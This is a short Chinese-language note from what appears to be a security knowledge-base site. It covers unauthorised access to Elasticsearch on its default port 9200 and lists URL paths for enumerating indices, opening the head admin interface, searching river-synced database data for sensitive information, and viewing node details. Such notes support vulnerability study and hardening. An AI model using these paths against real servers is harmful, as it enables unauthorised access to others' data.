menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right 039-Elasticsearch chevron_right 001-Elasticsearch未授权访问.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    001-Elasticsearch未授权访问.md
    622 B / 2021-07-17 00:01:30
        ## Elasticsearch未授权访问

### 一、漏洞简介

ElasticSearch 是一款Java编写的企业级搜索服务,启动此服务默认会开放HTTP-9200端口,可被非法操作数据。

### 二、影响范围

### 三、复现过程

安装了river之后可以同步多种数据库数据(包括关系型的mysql、mongodb等)。

```
http://url:9200/_cat/indices 里面的indices包含了_river一般就是安装了river了。

http://url:9200/_plugin/head/ web管理界面

http://url:9200/_cat/indices

http://url:9200/_river/_search 查看数据库敏感信息

http://url:9200/_nodes 查看节点数据
```
    links
    file_download